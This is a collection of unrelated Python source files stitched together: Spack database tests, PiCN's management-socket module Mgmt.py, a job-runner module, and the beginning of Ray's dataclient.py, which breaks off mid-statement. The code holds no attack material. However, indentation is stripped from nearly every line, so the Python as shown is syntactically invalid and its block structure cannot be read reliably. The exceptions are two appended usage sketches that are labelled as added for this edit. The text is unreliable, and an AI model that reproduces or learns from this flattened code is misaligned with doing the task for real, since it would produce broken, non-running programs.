"""Ensure the spack database is a valid merkle graph."""
all_specs = spack.store.db.query(installed=any)
seen = {}
for spec in all_specs:
for dep in spec.dependencies():
hash_key = dep.dag_hash()
if hash_key not in seen:
seen[hash_key] = id(dep)
else:
assert seen[hash_key] == id(dep)
def _check_db_sanity(database):
"""Utiilty function to check db against install layout."""
pkg_in_layout = sorted(spack.store.layout.all_specs())
actual = sorted(database.query())
externals = sorted([x for x in actual if x.external])
nexpected = len(pkg_in_layout) + len(externals)
assert nexpected == len(actual)
non_external_in_db = sorted([x for x in actual if not x.external])
for e, a in zip(pkg_in_layout, non_external_in_db):
assert e == a
_check_merkleiness()
def _check_remove_and_add_package(database, spec):
"""Remove a spec from the DB, then add it and make sure everything's
still ok once it is added. This checks that it was
removed, that it's back when added again, and that ref
counts are consistent.
"""
original = database.query()
database._check_ref_counts()
# Remove spec
concrete_spec = database.remove(spec)
database._check_ref_counts()
remaining = database.query()
# ensure spec we removed is gone
assert len(original) - 1 == len(remaining)
assert all(s in original for s in remaining)
assert concrete_spec not in remaining
# add it back and make sure everything is ok.
database.add(concrete_spec, spack.store.layout)
installed = database.query()
assert concrete_spec in installed
assert installed == original
# sanity check against directory layout and check ref counts.
_check_db_sanity(database)
database._check_ref_counts()
def _mock_install(spec):
s = spack.spec.Spec(spec)
s.concretize()
pkg = spack.repo.get(s)
pkg.do_install(fake=True)
def _mock_remove(spec):
specs = spack.store.db.query(spec)
assert len(specs) == 1
spec = specs[0]
spec.package.do_uninstall(spec)
def test_default_queries(database):
# Testing a package whose name *doesn't* start with 'lib'
# to ensure the library has 'lib' prepended to the name
rec = database.get_record('zmpi')
spec = rec.spec
libraries = spec['zmpi'].libs
assert len(libraries) == 1
assert libraries.names[0] == 'zmpi'
headers = spec['zmpi'].headers
assert len(headers) == 1
assert headers.names[0] == 'zmpi'
command = spec['zmpi'].command
assert isinstance(command, Executable)
assert command.name == 'zmpi'
assert os.path.exists(command.path)
# Testing a package whose name *does* start with 'lib'
# to ensure the library doesn't have a double 'lib' prefix
rec = database.get_record('libelf')
spec = rec.spec
libraries = spec['libelf'].libs
assert len(libraries) == 1
assert libraries.names[0] == 'elf'
headers = spec['libelf'].headers
assert len(headers) == 1
assert headers.names[0] == 'libelf'
command = spec['libelf'].command
assert isinstance(command, Executable)
assert command.name == 'libelf'
assert os.path.exists(command.path)
def test_005_db_exists(database):
"""Make sure db cache file exists after creating."""
index_file = os.path.join(database.root, '.spack-db', 'index.json')
lock_file = os.path.join(database.root, '.spack-db', 'lock')
assert os.path.exists(str(index_file))
assert os.path.exists(str(lock_file))
def test_010_all_install_sanity(database):
"""Ensure that the install layout reflects what we think it does."""
all_specs = spack.store.layout.all_specs()
assert len(all_specs) == 14
# Query specs with multiple configurations
mpileaks_specs = [s for s in all_specs if s.satisfies('mpileaks')]
callpath_specs = [s for s in all_specs if s.satisfies('callpath')]
mpi_specs = [s for s in all_specs if s.satisfies('mpi')]
assert len(mpileaks_specs) == 3
assert len(callpath_specs) == 3
assert len(mpi_specs) == 3
# Query specs with single configurations
dyninst_specs = [s for s in all_specs if s.satisfies('dyninst')]
libdwarf_specs = [s for s in all_specs if s.satisfies('libdwarf')]
libelf_specs = [s for s in all_specs if s.satisfies('libelf')]
assert len(dyninst_specs) == 1
assert len(libdwarf_specs) == 1
assert len(libelf_specs) == 1
# Query by dependency
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^mpich')]
) == 1
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^mpich2')]
) == 1
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^zmpi')]
) == 1
def test_015_write_and_read(mutable_database):
# write and read DB
with spack.store.db.write_transaction():
specs = spack.store.db.query()
recs = [spack.store.db.get_record(s) for s in specs]
for spec, rec in zip(specs, recs):
new_rec = spack.store.db.get_record(spec)
assert new_rec.ref_count == rec.ref_count
assert new_rec.spec == rec.spec
assert new_rec.path == rec.path
assert new_rec.installed == rec.installed
def test_017_write_and_read_without_uuid(mutable_database, monkeypatch):
monkeypatch.setattr(spack.database, '_use_uuid', False)
# write and read DB
with spack.store.db.write_transaction():
specs = spack.store.db.query()
recs = [spack.store.db.get_record(s) for s in specs]
for spec, rec in zip(specs, recs):
new_rec = spack.store.db.get_record(spec)
assert new_rec.ref_count == rec.ref_count
assert new_rec.spec == rec.spec
assert new_rec.path == rec.path
assert new_rec.installed == rec.installed
def test_020_db_sanity(database):
"""Make sure query() returns what's actually in the db."""
_check_db_sanity(database)
def test_025_reindex(mutable_database):
"""Make sure reindex works and ref counts are valid."""
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_026_reindex_after_deprecate(mutable_database):
"""Make sure reindex works and ref counts are valid after deprecation."""
mpich = mutable_database.query_one('mpich')
zmpi = mutable_database.query_one('zmpi')
mutable_database.deprecate(mpich, zmpi)
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_030_db_sanity_from_another_process(mutable_database):
def read_and_modify():
# check that other process can read DB
_check_db_sanity(mutable_database)
with mutable_database.write_transaction():
_mock_remove('mpileaks ^zmpi')
p = multiprocessing.Process(target=read_and_modify, args=())
p.start()
p.join()
# ensure child process change is visible in parent process
with mutable_database.read_transaction():
assert len(mutable_database.query('mpileaks ^zmpi')) == 0
def test_040_ref_counts(database):
"""Ensure that we got ref counts right when we read the DB."""
database._check_ref_counts()
def test_041_ref_counts_deprecate(mutable_database):
"""Ensure that we have appropriate ref counts after deprecating"""
mpich = mutable_database.query_one('mpich')
zmpi = mutable_database.query_one('zmpi')
mutable_database.deprecate(mpich, zmpi)
mutable_database._check_ref_counts()
def test_050_basic_query(database):
"""Ensure querying database is consistent with what is installed."""
# query everything
assert len(spack.store.db.query()) == 16
# query specs with multiple configurations
mpileaks_specs = database.query('mpileaks')
callpath_specs = database.query('callpath')
mpi_specs = database.query('mpi')
assert len(mpileaks_specs) == 3
assert len(callpath_specs) == 3
assert len(mpi_specs) == 3
# query specs with single configurations
dyninst_specs = database.query('dyninst')
libdwarf_specs = database.query('libdwarf')
libelf_specs = database.query('libelf')
assert len(dyninst_specs) == 1
assert len(libdwarf_specs) == 1
assert len(libelf_specs) == 1
# Query by dependency
assert len(database.query('mpileaks ^mpich')) == 1
assert len(database.query('mpileaks ^mpich2')) == 1
assert len(database.query('mpileaks ^zmpi')) == 1
# Query by date
assert len(database.query(start_date=datetime.datetime.min)) == 16
assert len(database.query(start_date=datetime.datetime.max)) == 0
assert len(database.query(end_date=datetime.datetime.min)) == 0
assert len(database.query(end_date=datetime.datetime.max)) == 16
def test_060_remove_and_add_root_package(mutable_database):
_check_remove_and_add_package(mutable_database, 'mpileaks ^mpich')
def test_070_remove_and_add_dependency_package(mutable_database):
_check_remove_and_add_package(mutable_database, 'dyninst')
def test_080_root_ref_counts(mutable_database):
rec = mutable_database.get_record('mpileaks ^mpich')
# Remove a top-level spec from the DB
mutable_database.remove('mpileaks ^mpich')
# record no longer in DB
assert mutable_database.query('mpileaks ^mpich', installed=any) == []
# record's deps have updated ref_counts
assert mutable_database.get_record('callpath ^mpich').ref_count == 0
assert mutable_database.get_record('mpich').ref_count == 1
# Put the spec back
mutable_database.add(rec.spec, spack.store.layout)
# record is present again
assert len(mutable_database.query('mpileaks ^mpich', installed=any)) == 1
# dependencies have ref counts updated
assert mutable_database.get_record('callpath ^mpich').ref_count == 1
assert mutable_database.get_record('mpich').ref_count == 2
def test_090_non_root_ref_counts(mutable_database):
mutable_database.get_record('mpileaks ^mpich')
mutable_database.get_record('callpath ^mpich')
# "force remove" a non-root spec from the DB
mutable_database.remove('callpath ^mpich')
# record still in DB but marked uninstalled
assert mutable_database.query('callpath ^mpich', installed=True) == []
assert len(mutable_database.query('callpath ^mpich', installed=any)) == 1
# record and its deps have same ref_counts
assert mutable_database.get_record(
'callpath ^mpich', installed=any
).ref_count == 1
assert mutable_database.get_record('mpich').ref_count == 2
# remove the only dependent of the uninstalled callpath record
mutable_database.remove('mpileaks ^mpich')
# record and parent are completely gone.
assert mutable_database.query('mpileaks ^mpich', installed=any) == []
assert mutable_database.query('callpath ^mpich', installed=any) == []
# mpich ref count updated properly.
mpich_rec = mutable_database.get_record('mpich')
assert mpich_rec.ref_count == 0
def test_100_no_write_with_exception_on_remove(database):
def fail_while_writing():
with database.write_transaction():
_mock_remove('mpileaks ^zmpi')
raise Exception()
with database.read_transaction():
assert len(database.query('mpileaks ^zmpi', installed=any)) == 1
with pytest.raises(Exception):
fail_while_writing()
# reload DB and make sure zmpi is still there.
with database.read_transaction():
assert len(database.query('mpileaks ^zmpi', installed=any)) == 1
def test_110_no_write_with_exception_on_install(database):
def fail_while_writing():
with database.write_transaction():
_mock_install('cmake')
raise Exception()
with database.read_transaction():
assert database.query('cmake', installed=any) == []
with pytest.raises(Exception):
fail_while_writing()
# reload DB and make sure cmake was not written.
with database.read_transaction():
assert database.query('cmake', installed=any) == []
def test_115_reindex_with_packages_not_in_repo(mutable_database):
# Don't add any package definitions to this repository; the idea is that
# packages should not have to be defined in the repository once they
# are installed
with spack.repo.swap(MockPackageMultiRepo()):
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_external_entries_in_db(mutable_database):
rec = mutable_database.get_record('mpileaks ^zmpi')
assert rec.spec.external_path is None
assert rec.spec.external_module is None
rec = mutable_database.get_record('externaltool')
assert rec.spec.external_path == '/path/to/external_tool'
assert rec.spec.external_module is None
assert rec.explicit is False
rec.spec.package.do_install(fake=True, explicit=True)
rec = mutable_database.get_record('externaltool')
assert rec.spec.external_path == '/path/to/external_tool'
assert rec.spec.external_module is None
assert rec.explicit is True
@pytest.mark.regression('8036')
def test_regression_issue_8036(mutable_database, usr_folder_exists):
# The test ensures that the external package prefix is treated as
# existing. Even when the package prefix exists, the package should
# not be considered installed until it is added to the database with
# do_install.
s = spack.spec.Spec('externaltool@0.9')
s.concretize()
assert not s.package.installed
# Now install the external package and check again the `installed` property
s.package.do_install(fake=True)
assert s.package.installed
@pytest.mark.regression('11118')
def test_old_external_entries_prefix(mutable_database):
with open(spack.store.db._index_path, 'r') as f:
db_obj = json.loads(f.read())
s = spack.spec.Spec('externaltool')
s.concretize()
db_obj['database']['installs'][s.dag_hash()]['path'] = 'None'
with open(spack.store.db._index_path, 'w') as f:
f.write(json.dumps(db_obj))
if _use_uuid:
with open(spack.store.db._verifier_path, 'w') as f:
f.write(str(uuid.uuid4()))
record = spack.store.db.get_record(s)
assert record.path is None
assert record.spec._prefix is None
assert record.spec.prefix == record.spec.external_path
def test_uninstall_by_spec(mutable_database):
with mutable_database.write_transaction():
for spec in mutable_database.query():
if spec.package.installed:
spack.package.PackageBase.uninstall_by_spec(spec, force=True)
else:
mutable_database.remove(spec)
assert len(mutable_database.query()) == 0
def test_query_unused_specs(mutable_database):
# This spec installs a fake cmake as a build only dependency
s = spack.spec.Spec('simple-inheritance')
s.concretize()
s.package.do_install(fake=True, explicit=True)
unused = spack.store.db.unused_specs
assert len(unused) == 1
assert unused[0].name == 'cmake'
@pytest.mark.regression('10019')
def test_query_spec_with_conditional_dependency(mutable_database):
# The issue is triggered by having dependencies that are
# conditional on a Boolean variant
s = spack.spec.Spec('hdf5~mpi')
s.concretize()
s.package.do_install(fake=True, explicit=True)
results = spack.store.db.query_local('hdf5 ^mpich')
assert not results
@pytest.mark.regression('10019')
def test_query_spec_with_non_conditional_virtual_dependency(database):
# Ensure the same issue doesn't come up for virtual
# dependencies that are not conditional on variants
results = spack.store.db.query_local('mpileaks ^mpich')
assert len(results) == 1
def test_failed_spec_path_error(database):
"""Ensure spec not concrete check is covered."""
s = spack.spec.Spec('a')
with pytest.raises(ValueError, match='Concrete spec required'):
spack.store.db._failed_spec_path(s)
@pytest.mark.db
def test_clear_failure_keep(mutable_database, monkeypatch, capfd):
"""Add test coverage for clear_failure operation when to be retained."""
def _is(db, spec):
return True
# Pretend the spec has been failure locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
s = spack.spec.Spec('a')
spack.store.db.clear_failure(s)
out = capfd.readouterr()[0]
assert 'Retaining failure marking' in out
@pytest.mark.db
def test_clear_failure_forced(mutable_database, monkeypatch, capfd):
"""Add test coverage for clear_failure operation when force."""
def _is(db, spec):
return True
# Pretend the spec has been failure locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
# Ensure an OSError is raised when trying to remove the non-existent marking
monkeypatch.setattr(spack.database.Database, 'prefix_failure_marked', _is)
s = spack.spec.Spec('a').concretized()
spack.store.db.clear_failure(s, force=True)
out = capfd.readouterr()[1]
assert 'Removing failure marking despite lock' in out
assert 'Unable to remove failure marking' in out
@pytest.mark.db
def test_mark_failed(mutable_database, monkeypatch, tmpdir, capsys):
"""Add coverage to mark_failed."""
def _raise_exc(lock):
raise lk.LockTimeoutError('Mock acquire_write failure')
# Ensure attempt to acquire write lock on the mark raises the exception
monkeypatch.setattr(lk.Lock, 'acquire_write', _raise_exc)
with tmpdir.as_cwd():
s = spack.spec.Spec('a').concretized()
spack.store.db.mark_failed(s)
out = str(capsys.readouterr()[1])
assert 'Unable to mark a as failed' in out
# Clean up the failure mark to ensure it does not interfere with other
# tests using the same spec.
del spack.store.db._prefix_failures[s.prefix]
@pytest.mark.db
def test_prefix_failed(mutable_database, monkeypatch):
"""Add coverage to prefix_failed operation."""
def _is(db, spec):
return True
s = spack.spec.Spec('a').concretized()
# Confirm the spec is not already marked as failed
assert not spack.store.db.prefix_failed(s)
# Check that a failure entry is sufficient
spack.store.db._prefix_failures[s.prefix] = None
assert spack.store.db.prefix_failed(s)
# Remove the entry and check again
del spack.store.db._prefix_failures[s.prefix]
assert not spack.store.db.prefix_failed(s)
# Now pretend that the prefix failure is locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
assert spack.store.db.prefix_failed(s)
def test_prefix_read_lock_error(mutable_database, monkeypatch):
"""Cover the prefix read lock exception."""
def _raise(db, spec):
raise lk.LockError('Mock lock error')
s = spack.spec.Spec('a').concretized()
# Ensure subsequent lock operations fail
monkeypatch.setattr(lk.Lock, 'acquire_read', _raise)
with pytest.raises(Exception):
with spack.store.db.prefix_read_lock(s):
assert False
def test_prefix_write_lock_error(mutable_database, monkeypatch):
"""Cover the prefix write lock exception."""
def _raise(db, spec):
raise lk.LockError('Mock lock error')
s = spack.spec.Spec('a').concretized()
# Ensure subsequent lock operations fail
monkeypatch.setattr(lk.Lock, 'acquire_write', _raise)
with pytest.raises(Exception):
with spack.store.db.prefix_write_lock(s):
assert False
|
Mgmt.py
|
"""Mgmt System for PiCN"""
import multiprocessing
import os
import select
import socket
import time
from typing import Dict
from PiCN.Layers.ICNLayer.ContentStore import BaseContentStore
from PiCN.Layers.ICNLayer.ForwardingInformationBase import BaseForwardingInformationBase
from PiCN.Layers.ICNLayer.PendingInterestTable import BasePendingInterestTable
from PiCN.Packets import Content, Name
from PiCN.Processes import LayerProcess
from PiCN.Processes import PiCNProcess
from PiCN.Layers.LinkLayer.Interfaces import AddressInfo, BaseInterface, UDP4Interface
class Mgmt(PiCNProcess):
"""Mgmt System for PiCN"""
def __init__(self, cs: BaseContentStore, fib: BaseForwardingInformationBase, pit:BasePendingInterestTable,
linklayer: LayerProcess, port: int, shutdown = None,
repo_prfx: str=None, repo_path: str=None, log_level=255):
super().__init__("MgmtSys", log_level)
self.cs = cs
self.fib = fib
self.pit = pit
self._linklayer = linklayer
self._repo_prfx = repo_prfx
self._repo_path = repo_path
self._port: int = port
# init MGMT
self.mgmt_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.mgmt_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.mgmt_sock.bind(("127.0.0.1", self._port))
self.mgmt_sock.listen(5)
self._buffersize = 8192
if os.name != 'nt':
self.shutdown = shutdown #function pointer
else:
self.logger.critical("Shutdown not available on NT platform")
def mgmt(self, mgmt_sock):
"""parse mgmt message"""
replysock, addr = mgmt_sock.accept()
try:
# receive data
data = replysock.recv(self._buffersize)
request_string = data.decode()
# Parse HTTP
fields = request_string.split("\r\n")
request: str = fields[0]
fields = fields[1:]
type, name = request.split(" ", 1)
httpversion = request.rsplit(" ", 1)[-1]
http = {}
for field in fields:
if (len(field.split(":")) == 2):
key, value = field.split(':', 1)
http[key] = value
# Execute MGMT
name = name.replace(" HTTP/1.1", "")
mgmt_request = name.split("/")
if (len(mgmt_request) == 4):
layer = mgmt_request[1]
command = mgmt_request[2]
params = mgmt_request[3]
if (layer == "linklayer"):
self.ll_mgmt(command, params, replysock)
elif(layer == "icnlayer"):
self.icnl_mgmt(command, params, replysock)
elif(layer == "repolayer"):
self.repol_mgmt(command, params, replysock)
elif len(mgmt_request) == 2:
if mgmt_request[1] == "shutdown":
self.logger.info("Shutdown")
replysock.send("HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n shutdown\r\n".encode())
replysock.close()
time.sleep(2)
self.shutdown()
finally:
replysock.close()
def ll_mgmt(self, command, params, replysock):
# newface expects /linklayer/newface/ip:port:if_num
if (command == "newface"):
ip, port, if_num = params.split(":", 2)
if port != 'None':
port = int(port)
if_num = int(if_num)
if port != 'None':
fid = self._linklayer.faceidtable.get_or_create_faceid(AddressInfo((ip, port), if_num))
else:
fid = self._linklayer.faceidtable.get_or_create_faceid(AddressInfo(ip, if_num))
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n newface OK:" + str(fid) + "\r\n"
replysock.send(reply.encode())
self.logger.info("New Face added " + ip + "|" + str(port) + ", FaceID: " + str(fid))
else:
self.unknown_command(replysock)
return
def icnl_mgmt(self, command, params, replysock):
if (self.cs is None or self.fib is None or self.pit is None):
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n Not a Forwarder OK\r\n"
replysock.send(reply.encode())
# newforwardingrule expects /icnlayer/newforwardingrule/prefix:faceid(,faceid...)
elif (command == "newforwardingrule"):
prefix, faceid = params.split(":", 1)
faceid_str = faceid
faceid = faceid.split(',')
faceid = list(map(lambda x: int(x), faceid))
prefix = prefix.replace("%2F", "/")
name = Name(prefix)
self.fib.add_fib_entry(name, faceid, True)
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n newforwardingrule OK:" + str(faceid_str) + "\r\n"
replysock.send(reply.encode())
self.logger.info("New Forwardingrule added " + prefix + "|" + str(faceid))
return
elif(command == "newcontent"):
prefix, content = params.split(":", 1)
prefix = prefix.replace("%2F", "/")
name = Name(prefix)
content = Content(name, content)
self.cs.add_content_object(content, static=True)
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n newcontent OK\r\n"
replysock.send(reply.encode())
self.logger.info("New content added " + prefix + "|" + content.content)
return
else:
self.unknown_command(replysock)
return
def repol_mgmt(self, command, params, replysock):
if (self._repo_path is None or self._repo_prfx is None):
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n Not a Repo OK\r\n"
replysock.send(reply.encode())
elif(command == "getprefix"):
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n " + str(self._repo_prfx) + " OK\r\n"
replysock.send(reply.encode())
elif(command =="getpath"):
abs_path = os.path.abspath(str(self._repo_path))
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n " + str(abs_path) + " OK\r\n"
replysock.send(reply.encode())
else:
self.unknown_command(replysock)
return
def unknown_command(self, replysock):
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n Unknown Command\r\n"
replysock.send(reply.encode())
def _run_select(self, mgmt_sock):
while True:
socks = [mgmt_sock]
ready_vars, _, _ = select.select(socks, [], [])
self.mgmt(mgmt_sock)
def _run_poll(self, mgmt_sock):
poller = select.poll()
READ_ONLY = select.POLLIN | select.POLLPRI | select.POLLHUP | select.POLLERR
poller.register(mgmt_sock, READ_ONLY)
while True:
ready_vars = poller.poll()
self.mgmt(mgmt_sock)
def _run(self, mgmt_sock):
if os.name == 'nt':
self._run_select(mgmt_sock)
else:
self._run_poll(mgmt_sock)
def start_process(self):
self._process = multiprocessing.Process(target=self._run, args=[self.mgmt_sock])
self._process.start()
def stop_process(self):
if self._process is not None:
self._process.terminate()
self._process = None
self.mgmt_sock.close()
def __del__(self):
try:
self.mgmt_sock.close()
except:
pass
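# Illustrative usage sketch (an assumption for this edit, not part of PiCN):
# the management interface above accepts HTTP-style GET requests on 127.0.0.1,
# e.g. "/linklayer/newface/<ip>:<port>:<if_num>". The port value below is a
# placeholder; the function is never invoked at import time.
def _example_mgmt_newface(mgmt_port: int = 9000) -> str:
    request = "GET /linklayer/newface/127.0.0.1:9500:0 HTTP/1.1\r\n\r\n"
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect(("127.0.0.1", mgmt_port))
        sock.send(request.encode())
        # the reply body looks like "... newface OK:<faceid>"
        return sock.recv(8192).decode()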
|
job.py
|
"""
**job** module handles all the job running logic:
- consistent exception handling and logging
- currently 2 job runners are implemented:
  - SimpleJobRunner runs the jobs sequentially.
  - MultiThreadingJobRunner queues the jobs and runs them in dedicated worker threads
(a small usage sketch is appended at the end of this module)
"""
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor, as_completed
from enum import Enum, auto
import logging
import multiprocessing
import queue
import signal
import threading
import time
from .utils import Namespace, Timer, InterruptTimeout, raise_in_thread, signal_handler
log = logging.getLogger(__name__)
class State(Enum):
created = auto()
cancelled = auto()
running = auto()
rescheduled = auto()
stopping = auto()
stopped = auto()
class JobError(Exception):
pass
class InvalidStateError(JobError):
pass
class CancelledError(JobError):
pass
class Job:
def __init__(self, name="", timeout_secs=None, priority=None):
self.name = name
self.timeout = timeout_secs
self.priority = priority
self.state = State.created
self.thread_id = None
def start(self):
try:
start_msg = "Starting job {}.".format(self.name)
self.thread_id = threading.current_thread().ident
if self.state == State.stopping:
self.state = State.cancelled
raise CancelledError("Job was cancelled.")
elif self.state != State.created:
self.state = State.cancelled
raise InvalidStateError("Job can't be started from state `{}`.".format(self.state))
log.info("\n%s\n%s", '-'*len(start_msg), start_msg)
self.state = State.running
self._prepare()
with Timer() as t:
# don't propagate interruption error here (sig=None) so that we can collect the timeout in the result
with InterruptTimeout(self.timeout, sig=None):
result = self._run()
log.info("Job %s executed in %.3f seconds.", self.name, t.duration)
log.debug("Job %s returned: %s", self.name, result)
return result, t.duration
except Exception as e:
log.error("Job `%s` failed with error: %s", self.name, str(e))
log.exception(e)
return None, -1
def stop(self):
try:
self.state = State.stopping
self._stop()
return 0
except Exception as e:
log.exception(e)
return 1
def done(self):
try:
if self.state in [State.rescheduled, State.running, State.stopping]:
self._on_done()
except Exception as e:
log.error("Job `%s` completion failed with error: %s", self.name, str(e))
log.exception(e)
finally:
if self.state is State.rescheduled:
self.reset()
else:
self.reset(State.stopped)
def reschedule(self):
self.state = State.rescheduled
self.thread_id = None
def reset(self, state=State.created):
self.state = state
self.thread_id = None
def _prepare(self):
"""hood to execute pre-run logic: this is executed in the same thread as the run logic."""
pass
def _run(self):
"""jobs should implement their run logic in this method."""
pass
def _stop(self):
if self.thread_id is not None:
raise_in_thread(self.thread_id, CancelledError)
def _on_done(self):
"""hook to execute logic after job completion in a thread-safe way as this is executed in the main thread."""
pass
class JobRunner:
def __init__(self, jobs):
self.jobs = jobs
self.results = []
self.state = State.created
self._queue = None
self._last_priority = 0
def start(self):
if self.state != State.created:
raise InvalidStateError(self.state)
self._init_queue()
self.state = State.running
with Timer() as t:
self._run()
self.state = State.stopped
log.info("All jobs executed in %.3f seconds.", t.duration)
return self.results
def stop(self):
self.state = State.stopping
self._queue.put((-1, None))
return self._stop()
def stop_if_complete(self):
if 0 < len(self.jobs) == len(self.results):
self.stop()
def put(self, job, priority=None):
if priority is None:
if job.priority is None:
job.priority = self._last_priority = self._last_priority+1
else:
job.priority = priority
self._queue.put((job.priority, job))
def _init_queue(self):
self._queue = queue.PriorityQueue(maxsize=len(self.jobs))
for job in self.jobs:
self.put(job)
def __iter__(self):
return self
def __next__(self):
if self._queue is None:
return
_, job = self._queue.get()
self._queue.task_done()
if job is None:
self._queue = None
return
return job
def _run(self):
pass
def _stop(self):
for job in self.jobs:
job.stop()
class SimpleJobRunner(JobRunner):
def _run(self):
for job in self:
if self.state == State.stopping:
break
result, duration = job.start()
if job.state is not State.rescheduled:
self.results.append(Namespace(name=job.name, result=result, duration=duration))
job.done()
self.stop_if_complete()
class MultiThreadingJobRunner(JobRunner):
def __init__(self, jobs, parallel_jobs=1, done_async=True, delay_secs=0, use_daemons=False):
super().__init__(jobs)
self.parallel_jobs = parallel_jobs
self._done_async = done_async
self._delay = delay_secs # short sleep between enqueued jobs to make console more readable
self._daemons = use_daemons
def _run(self):
signal_handler(signal.SIGINT, self.stop)
q = queue.Queue()
def worker():
while True:
job = q.get()
if job is None or self.state == State.stopping:
q.task_done()
break
result, duration = job.start()
if job.state is not State.rescheduled:
self.results.append(Namespace(name=job.name, result=result, duration=duration))
if self._done_async:
job.done()
self.stop_if_complete()
q.task_done()
threads = []
for thread in range(self.parallel_jobs):
thread = threading.Thread(target=worker, daemon=self._daemons)
thread.start()
threads.append(thread)
try:
for job in self:
if self.state == State.stopping:
break
q.put(job) # TODO: timeout
if self._delay > 0:
time.sleep(self._delay)
q.join()
finally:
for _ in range(self.parallel_jobs):
q.put(None) # stopping workers
for thread in threads:
thread.join()
if not self._done_async:
for job in self.jobs:
job.done()
class MultiProcessingJobRunner(JobRunner):
pass
""" Experimental: trying to simplify multi-threading/processing"""
class ExecutorJobRunner(JobRunner):
def __init__(self, pool_executor_class, jobs, parallel_jobs):
super().__init__(jobs)
self.pool_executor_class = pool_executor_class
self.parallel_jobs = parallel_jobs
def _run(self):
def worker(job):
result, duration = job.start()
job.done()
return Namespace(name=job.name, result=result, duration=duration)
with self.pool_executor_class(max_workers=self.parallel_jobs) as executor:
self.results.extend(executor.map(worker, self.jobs))
# futures = []
# for job in self.jobs:
# future = executor.submit(worker, job)
# # future.add_done_callback(lambda _: job.done())
# futures.append(future)
# for future in as_completed(futures):
# self.results.append(future.result())
class ThreadPoolExecutorJobRunner(ExecutorJobRunner):
def __init__(self, jobs, parallel_jobs):
super().__init__(ThreadPoolExecutor, jobs, parallel_jobs)
class ProcessPoolExecutorJobRunner(ExecutorJobRunner):
def __init__(self, jobs, parallel_jobs):
super().__init__(ProcessPoolExecutor, jobs, parallel_jobs)
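# Minimal usage sketch (an assumption for this edit, not part of the public
# module API, and never invoked at import time): subclass Job, implement
# _run(), and hand the jobs to a runner, as referenced in the module docstring.
def _example_simple_runner():
    class SquareJob(Job):
        def __init__(self, value):
            super().__init__(name="square_%s" % value)
            self.value = value
        def _run(self):
            # the actual work; the runner records the return value and duration
            return self.value * self.value
    runner = SimpleJobRunner([SquareJob(2), SquareJob(3)])
    # returns a list of Namespace(name=..., result=..., duration=...) entries
    return runner.start()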
|
dataclient.py
|
"""This file implements a threaded stream controller to abstract a data stream
back to the ray clientserver.
"""
import logging
import queue
import threading
import grpc
from typing import Any, Callable, Dict, Optional
import ray.core.generated.ray_client_pb2 as ray_client_pb2
import ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc
logger = logging.getLogger(__name__)
# The maximum field value for request_id -- which is also the maximum
# number of simultaneous in-flight requests.
INT32_MAX = (2**31) - 1
ResponseCallable = Callable[[ray_client_pb2.DataResponse], None]
class DataClient:
def __init__(self, channel: "grpc._channel.Channel", client_id: str,
metadata: list):
"""Initializes a thread-safe datapath over a Ray Client gRPC channel.
Args:
channel: connected gRPC channel
client_id: the generated ID representing this client
metadata: metadata to pass to gRPC requests
"""
self.channel = channel
self.request_queue = queue.Queue()
self.data_thread = self._start_datathread()
self.ready_data: Dict[int, Any] = {}
self.cv = threading.Condition()
self.lock = threading.RLock()
# NOTE: Dictionary insertion is guaranteed to complete before lookup
# and/or removal because of synchronization via the request_queue.
self.asyncio_waiting_data: Dict[int, ResponseCallable] = {}
self._req_id = 0
self._client_id = client_id
self._metadata = metadata
self._in_shutdown = False
self.data_thread.start()
def _next_id(self) -> int:
with self.lock:
self._req_id += 1
if self._req_id > INT32_MAX:
self._req_id = 1
# Responses that aren't tracked (like opportunistic releases)
# have req_id=0, so make sure we never mint such an id.
assert self._req_id != 0
return self._req_id
def _start_datathread(self) -> threading.Thread:
return threading.Thread(target=self._data_main, args=(), daemon=True)
def _data_main(self) -> None:
stub = ray_client_pb2_grpc.RayletDataStreamerStub(self.channel)
resp_stream = stub.Datapath(
iter(self.request_queue.get, None),
metadata=self._metadata,
wait_for_ready=True)
try:
for response in resp_stream:
if response.req_id == 0:
# This is not being waited for.
logger.debug(f"Got unawaited response {response}")
continue
if response.req_id in self.asyncio_waiting_data:
callback = self.asyncio_waiting_data.pop(response.req_id)
try:
callback(response)
except Exception:
logger.exception("Callback error:")
else:
with self.cv:
self.ready_data[response.req_id] = response
self.cv.notify_all()
except grpc.RpcError as e:
with self.cv:
self._in_shutdown = True
self.cv.notify_all()
if e.code() == grpc.StatusCode.CANCELLED:
# Gracefully shutting down
logger.info("Cancelling data channel")
elif e.code() in (grpc.StatusCode.UNAVAILABLE,
grpc.StatusCode.RESOURCE_EXHAUSTED):
# TODO(barakmich): The server may have
# dropped. In theory, we can retry, as per
# https://grpc.github.io/grpc/core/md_doc_statuscodes.html but
# in practice we may need to think about the correct semantics
# here.
logger.info("Server disconnected from data channel")
else:
logger.exception(
"Got Error from data channel -- shutting down:")
def close(self) -> None:
if self.request_queue is not None:
self.request_queue.put(None)
if self.data_thread is not None:
self.data_thread.join()
def _blocking_send(self, req: ray_client_pb2.DataRequest
) -> ray_client_pb2.DataResponse:
if self._in_shutdown:
raise ConnectionError(
"Request can't be sent because the data channel is "
